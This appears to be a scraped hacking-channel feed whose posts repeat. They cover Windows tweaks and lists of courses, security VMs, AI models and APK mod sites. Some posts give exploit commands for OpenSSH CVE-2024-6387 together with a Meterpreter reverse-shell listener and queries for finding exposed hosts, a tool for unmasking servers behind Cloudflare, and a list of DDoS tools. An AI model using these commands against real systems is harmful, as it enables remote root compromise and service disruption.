🦑 ExplorerPatcher Installation and Configuration Guide
ExplorerPatcher enhances the Windows desktop experience, bringing back classic features like the Windows 10 taskbar, Start menu, and Alt+Tab interface on Windows 11.
### How to Install ExplorerPatcher
1. Download the Installer:
- Visit the official source to download the latest version of the setup program.
- Choose the appropriate version:
-
-
2. Run the Installer:
- Double-click the setup file.
- Accept the User Account Control (UAC) prompt for elevation.
- The installer will automatically add the required files.
3. Access ExplorerPatcher Settings:
- Once installation is complete, right-click the taskbar and select "Properties" to open the configuration interface.
### Customizing ExplorerPatcher
1. Windows 10 Taskbar on Windows 11:
- Go to the "Taskbar" section.
- Change the Taskbar style to Windows 10 (ExplorerPatcher).
2. Windows 10 Start Menu:
- Navigate to the "Start menu" section.
- Change the Start menu style to Windows 10.
3. Windows 10 Alt+Tab Interface:
- Open the "Window switcher" section.
- Set the Window switcher (Alt+Tab) style to Windows 10.
4. Explore Additional Features:
- Browse through other sections to tweak additional settings, such as system tray behavior, network icons, or window snapping.
### Important Notes
- Make sure your antivirus is configured to allow ExplorerPatcher to avoid interruptions.
- Regularly check for updates to stay compatible with the latest Windows 11 versions.
Download:
https://github.com/valinet/ExplorerPatcher
ExplorerPatcher enhances the Windows desktop experience, bringing back classic features like the Windows 10 taskbar, Start menu, and Alt+Tab interface on Windows 11.
### How to Install ExplorerPatcher
1. Download the Installer:
- Visit the official source to download the latest version of the setup program.
- Choose the appropriate version:
-
ep_setup.exe for Intel or AMD processors.-
ep_setup_arm64.exe for Snapdragon processors.2. Run the Installer:
- Double-click the setup file.
- Accept the User Account Control (UAC) prompt for elevation.
- The installer will automatically add the required files.
3. Access ExplorerPatcher Settings:
- Once installation is complete, right-click the taskbar and select "Properties" to open the configuration interface.
### Customizing ExplorerPatcher
1. Windows 10 Taskbar on Windows 11:
- Go to the "Taskbar" section.
- Change the Taskbar style to Windows 10 (ExplorerPatcher).
2. Windows 10 Start Menu:
- Navigate to the "Start menu" section.
- Change the Start menu style to Windows 10.
3. Windows 10 Alt+Tab Interface:
- Open the "Window switcher" section.
- Set the Window switcher (Alt+Tab) style to Windows 10.
4. Explore Additional Features:
- Browse through other sections to tweak additional settings, such as system tray behavior, network icons, or window snapping.
### Important Notes
- Make sure your antivirus is configured to allow ExplorerPatcher to avoid interruptions.
- Regularly check for updates to stay compatible with the latest Windows 11 versions.
Download:
https://github.com/valinet/ExplorerPatcher
GitHub
GitHub - valinet/ExplorerPatcher: This project aims to enhance the working environment on Windows
This project aims to enhance the working environment on Windows - valinet/ExplorerPatcher
🦑Modular penetration testing platform that enables you to write, test, and execute exploit code.
HatSploit Framework:
Installing Python
Most Unix-like systems (e.g., Ubuntu or Debian) already include Python. If not, or if you need the latest version, follow these steps:
1. Update your package list:
2. Install Python 3 and pip:
- This ensures both Python 3 and
3. Verify the installation:
- These commands should output the installed versions of Python and pip.
---
### Installing HatSploit
1. Install HatSploit Framework via pip:
2. Verify the installation:
- To confirm that HatSploit is installed correctly, try running the framework:
- If the command launches the framework, the installation was successful.
---
### Additional Notes
- Make sure you have git installed on your system to allow
- If you encounter permission issues during the
Let me know if you need further assistance!
HatSploit Framework:
Installing Python
Most Unix-like systems (e.g., Ubuntu or Debian) already include Python. If not, or if you need the latest version, follow these steps:
1. Update your package list:
sudo apt-get update
2. Install Python 3 and pip:
sudo apt-get install -y python3 python3-pip
- This ensures both Python 3 and
pip, the Python package manager, are installed.3. Verify the installation:
python3 --version
pip3 --version
- These commands should output the installed versions of Python and pip.
---
### Installing HatSploit
1. Install HatSploit Framework via pip:
pip3 install git+https://github.com/EntySec/HatSploit
2. Verify the installation:
- To confirm that HatSploit is installed correctly, try running the framework:
hatsploit
- If the command launches the framework, the installation was successful.
---
### Additional Notes
- Make sure you have git installed on your system to allow
pip3 to clone the GitHub repository. If not, install it using:sudo apt-get install -y git
- If you encounter permission issues during the
pip3 install step, try adding --user to the command or use sudo.Let me know if you need further assistance!
GitHub
GitHub - EntySec/HatSploit: Modular penetration testing platform that enables you to write, test, and execute exploit code.
Modular penetration testing platform that enables you to write, test, and execute exploit code. - EntySec/HatSploit
🦑AI security related frameworks, attacks, tools and papers:
https://github.com/ottosulin/awesome-ai-security
https://github.com/ottosulin/awesome-ai-security
GitHub
GitHub - ottosulin/awesome-ai-security: A collection of awesome resources related AI security
A collection of awesome resources related AI security - ottosulin/awesome-ai-security
Forwarded from Exploiting Crew (Pr1vAt3)
30 Best Courses For Network Engineer on Youtube:
============================
1. Network Troubleshooting
https://lnkd.in/dkqAVF7U
2. Palo Alto Firewall
https://lnkd.in/dj4NtUMj
3. Cisco SD-WAN
https://lnkd.in/dp6uEDtN
4. Scenario-Based Network Configuration
https://lnkd.in/dA7aTHHA
5. Real-Time Networks Trouble Ticket
https://lnkd.in/dDGYPVs2
6. Viptela SD-WAN Configurations
https://lnkd.in/dXDwhB8u
7. Enterprise Network Configuration
https://lnkd.in/dQhGW4Ae
8. Small Companies Network
https://lnkd.in/d9ffBAKM
9. Switching Technology
https://lnkd.in/dPUCnr86
10. Real Devices Configuration
https://lnkd.in/dMj-HkCA
11. Live Training
https://lnkd.in/dZeX7UdX
12. EIGRP
https://lnkd.in/dMVp98a4
13. Wireless
https://lnkd.in/djjQZPJA
14. ASA Firewall Configuration
https://lnkd.in/djiSD5xE
15. Voice over IP(VoIP)
https://lnkd.in/dsHv2R6V
16. Important Networking Topics
https://lnkd.in/dTsd-h_k
17. OSPF
https://lnkd.in/dUYZME73
18. CCNA 200-301
https://lnkd.in/d8WtGDk6
19. VPN
https://lnkd.in/d7shGyZ6
20. STP
https://lnkd.in/dfVQqetM
21. Basic Configurations
https://lnkd.in/dSybFbZr
22. BGP
https://lnkd.in/dRNCvUgn
23. MPLS
https://lnkd.in/d7ekXYm8
24. IPv6
https://lnkd.in/dGNKcyKT
25. VRF
https://lnkd.in/dxSXx2sK
26. PBR
https://lnkd.in/du4k2BUX
27. EtherChannel
https://lnkd.in/dhxYtpwY
28. FHRP Full Course
https://lnkd.in/d3rzcCfc
29. Subnetting QnA
https://lnkd.in/dZyJjkc5
30. Packet Flow
https://lnkd.in/ddtQ2YJz
============================
1. Network Troubleshooting
https://lnkd.in/dkqAVF7U
2. Palo Alto Firewall
https://lnkd.in/dj4NtUMj
3. Cisco SD-WAN
https://lnkd.in/dp6uEDtN
4. Scenario-Based Network Configuration
https://lnkd.in/dA7aTHHA
5. Real-Time Networks Trouble Ticket
https://lnkd.in/dDGYPVs2
6. Viptela SD-WAN Configurations
https://lnkd.in/dXDwhB8u
7. Enterprise Network Configuration
https://lnkd.in/dQhGW4Ae
8. Small Companies Network
https://lnkd.in/d9ffBAKM
9. Switching Technology
https://lnkd.in/dPUCnr86
10. Real Devices Configuration
https://lnkd.in/dMj-HkCA
11. Live Training
https://lnkd.in/dZeX7UdX
12. EIGRP
https://lnkd.in/dMVp98a4
13. Wireless
https://lnkd.in/djjQZPJA
14. ASA Firewall Configuration
https://lnkd.in/djiSD5xE
15. Voice over IP(VoIP)
https://lnkd.in/dsHv2R6V
16. Important Networking Topics
https://lnkd.in/dTsd-h_k
17. OSPF
https://lnkd.in/dUYZME73
18. CCNA 200-301
https://lnkd.in/d8WtGDk6
19. VPN
https://lnkd.in/d7shGyZ6
20. STP
https://lnkd.in/dfVQqetM
21. Basic Configurations
https://lnkd.in/dSybFbZr
22. BGP
https://lnkd.in/dRNCvUgn
23. MPLS
https://lnkd.in/d7ekXYm8
24. IPv6
https://lnkd.in/dGNKcyKT
25. VRF
https://lnkd.in/dxSXx2sK
26. PBR
https://lnkd.in/du4k2BUX
27. EtherChannel
https://lnkd.in/dhxYtpwY
28. FHRP Full Course
https://lnkd.in/d3rzcCfc
29. Subnetting QnA
https://lnkd.in/dZyJjkc5
30. Packet Flow
https://lnkd.in/ddtQ2YJz
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Forwarded from Exploiting Crew (Pr1vAt3)
𝐓𝐎𝐏 𝟐𝟎 𝐕𝐈𝐑𝐓𝐔𝐀𝐋 𝐌𝐀𝐂𝐇𝐈𝐍𝐄𝐒 𝐅𝐎𝐑 𝐂𝐘𝐁𝐄𝐑𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘 𝐏𝐑𝐎𝐅𝐄𝐒𝐒𝐈𝐎𝐍𝐀𝐋𝐒
ℹ️ Here’s a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:
💿 Predator-OS (Pentesting):
https://predator-os.ir/
💿 BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK
💿 BackBox (Pentesting):
https://www.backbox.org/
💿 Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97
💿 Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/
💿 Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B
💿 Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f
💿 Tails (Privacy and Anonymity):
https://tails.net/
💿 Qubes OS (Hypervisor):
https://www.qubes-os.org/
💿 Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x
💿 Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB
💿 SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP
💿 CSI Linux (Digital Forensics):
https://csilinux.com/
💿 CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs
💿 RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3
💿 FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz
💿 REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/
💿 Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG
💿 Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav
ℹ️ Here’s a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:
💿 Predator-OS (Pentesting):
https://predator-os.ir/
💿 BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK
💿 BackBox (Pentesting):
https://www.backbox.org/
💿 Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97
💿 Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/
💿 Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B
💿 Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f
💿 Tails (Privacy and Anonymity):
https://tails.net/
💿 Qubes OS (Hypervisor):
https://www.qubes-os.org/
💿 Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x
💿 Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB
💿 SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP
💿 CSI Linux (Digital Forensics):
https://csilinux.com/
💿 CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs
💿 RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3
💿 FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz
💿 REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/
💿 Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG
💿 Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav
Penetration testing and Ethical hacking
mainpage
What is Predator-OS   v3.5 01-01-2025 Polymorphic Security Platform Predator-OS is an advanced Linux distribution developed in 2021 by Hossein Seilani, the creator of other well-known […]
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Cloudflare Bypass:
CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs
CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.
---
Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).
---
Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.
---
Installation:
#### Prerequisites:
1. PHP and
Install on Ubuntu:
#### Clone the Repository:
#### Run the Script:
To reveal the real IP behind a domain:
#### Easy Installation:
For quick execution from anywhere on Linux:
Now you can run CrimeFlare with:
---
### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)
---
### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.
---
### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)
---
### Quick Commands:
- Clone repository:
- Execute the script:
- Install for system-wide access:
- Run directly:
---
### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)
CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs
CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.
---
Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).
---
Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.
---
Installation:
#### Prerequisites:
1. PHP and
php-curl must be installed. Install on Ubuntu:
sudo apt install php php-curl
#### Clone the Repository:
git clone https://github.com/zidansec/CloudPeler.git
cd CloudPeler
#### Run the Script:
To reveal the real IP behind a domain:
php crimeflare.php example.com
#### Easy Installation:
For quick execution from anywhere on Linux:
sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare
Now you can run CrimeFlare with:
crimeflare example.com
---
### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)
---
### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.
---
### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)
---
### Quick Commands:
- Clone repository:
git clone https://github.com/zidansec/CloudPeler.git
- Execute the script:
php crimeflare.php example.com
- Install for system-wide access:
sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare
- Run directly:
crimeflare example.com
---
### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)
GitHub
GitHub - zidansec/CloudPeler: CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you…
CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting infor...
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Largest and most advanced AI models available on Hugging Face in 2024:
1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).
2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).
3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).
4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).
5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).
For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).
1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).
2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).
3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).
4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).
5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).
For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).
huggingface.co
Models – Hugging Face
Explore machine learning models.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Best apk mod websites:
1 apkmody https://apkmody.io ✔️
2 modcombo https://modcombo.com ✔️
3 happymod https://happymod.com ✔️
4 modyolo https://modyolo.com ✔️
5 luckymodapk https://www.luckymodapk.com ✔️
6 an1 https://an1.com ✔️
7 getmodsapk https://getmodsapk.com ✔️
8 moddroid https://moddroid.co ✔️
9 modded-1 https://modded-1.com ✔️
10 techbigs https://techbigs.com ✔️
11 apktodo https://apktodo.com ✔️
12 m.playmods https://m.playmods.net ✔️
13 modradar https://modradar.net ✔️
14 apkmodule https://apkmodule.com ✔️
15 modhello https://modhello.com ✔️
1 apkmody https://apkmody.io ✔️
2 modcombo https://modcombo.com ✔️
3 happymod https://happymod.com ✔️
4 modyolo https://modyolo.com ✔️
5 luckymodapk https://www.luckymodapk.com ✔️
6 an1 https://an1.com ✔️
7 getmodsapk https://getmodsapk.com ✔️
8 moddroid https://moddroid.co ✔️
9 modded-1 https://modded-1.com ✔️
10 techbigs https://techbigs.com ✔️
11 apktodo https://apktodo.com ✔️
12 m.playmods https://m.playmods.net ✔️
13 modradar https://modradar.net ✔️
14 apkmodule https://apkmodule.com ✔️
15 modhello https://modhello.com ✔️
ModCombo.com
MODCOMBO - Free MOD APK Games & Premium Apps for Android 2025
Download free MOD APK games & premium apps at ModCombo. Enjoy unlimited money, unlocked features, and cheat mods to beat any Android game in 2025!
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Exploit The 2024 OpenSSH sshd:
A critical vulnerability identified as CVE-2024-6387 affects OpenSSH
🔍 Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the
- Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default
🌟 Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.
---
⚙️ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):
#### Basic Commands
- Scan a Target:
- Exploit a Target:
#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
|
|
|
|
|
|
---
### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:
#### Exploitation Example
Run the exploit tool with the configured settings:
---
### 🔍 Host Discovery
#### OSINT Techniques
- Hunter:
- FOFA:
- SHODAN:
- CENSYS:
---
### 🛡 Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.
2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.
3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.
4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.
5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.
Color-Coded Output
- 🟢 Green: Successful connection or exploit.
- 🔴 Red: Failed connection or error.
- 🟡 Yellow: Warnings or notable information.
- 🔵 Cyan: General updates or information.
Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387
A critical vulnerability identified as CVE-2024-6387 affects OpenSSH
sshd and allows remote unauthenticated attackers to execute arbitrary code as root due to a signal handler race condition. Below is a comprehensive breakdown of this flaw, usage instructions for associated tools, and mitigation strategies.🔍 Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the
SIGALRM handler of sshd when a client fails to authenticate within the LoginGraceTime (default 120 seconds). This handler invokes functions that are not asynchronous-signal-safe, creating a window for exploitation. - Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default
LoginGraceTime settings. 🌟 Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.
---
⚙️ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):
pip install -r requirements.txt
#### Basic Commands
- Scan a Target:
python3 CVE-2024-6387.py scan -T example.com -p 22
- Exploit a Target:
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
|
-T, --targets | IP, domain, file path, or CIDR range to scan. | N/A ||
-p, --port | SSH port to target. | 22 ||
-s, --speed | Threads for scanning/exploitation. | 10 ||
-t, --timeout | Connection timeout in seconds. | 1 ||
-o, --output | Output format (csv, txt, json). | json ||
-g, --gracetimecheck| Check for LoginGraceTime mitigation (seconds). | 120 |---
### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"#### Exploitation Example
Run the exploit tool with the configured settings:
python3 CVE-2024-6387.py exploit -T target.com -p 22 -n eth0
---
### 🔍 Host Discovery
#### OSINT Techniques
- Hunter:
/product.name="OpenSSH" - FOFA:
app="OpenSSH" - SHODAN:
product:"OpenSSH" - CENSYS:
(openssh) and labels=remote-access ---
### 🛡 Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.
2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.
3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.
4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.
5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.
Color-Coded Output
- 🟢 Green: Successful connection or exploit.
- 🔴 Red: Failed connection or error.
- 🟡 Yellow: Warnings or notable information.
- 🔵 Cyan: General updates or information.
Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387
GitHub
GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Top DDoS Tools for Educational Penetration Testing in 2024:
Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.
1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.
---
2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.
---
3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.
---
4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.
---
5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.
---
6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.
---
7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.
Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.
1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.
---
2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.
---
3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.
---
4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.
---
5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.
---
6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.
---
7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.
SourceForge
LOIC
Download LOIC for free. A network stress testing application. Low Orbit Ion Cannon. The project only keeps and maintains (bug fixing) the code written by the original author - Praetox, but is not associated or related to it.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Large CTF collections:
### TryHackMe (THM) Links
1. [Official TryHackMe Website](https://tryhackme.com)
2. [TryHackMe Learning Paths](https://tryhackme.com/paths)
3. [Free Rooms on TryHackMe](https://tryhackme.com/free)
4. [TryHackMe Discord Community](https://discord.gg/tryhackme)
5. [TryHackMe Blog](https://blog.tryhackme.com)
6. [GitHub: Awesome TryHackMe Writeups](https://github.com/0xagun/awesome-tryhackme-writeups)
### Popular CTF Platforms
7. [Hack The Box](https://www.hackthebox.com/)
8. [CTFtime](https://ctftime.org/)
9. [PicoCTF](https://picoctf.org/)
10. [Root Me](https://www.root-me.org/)
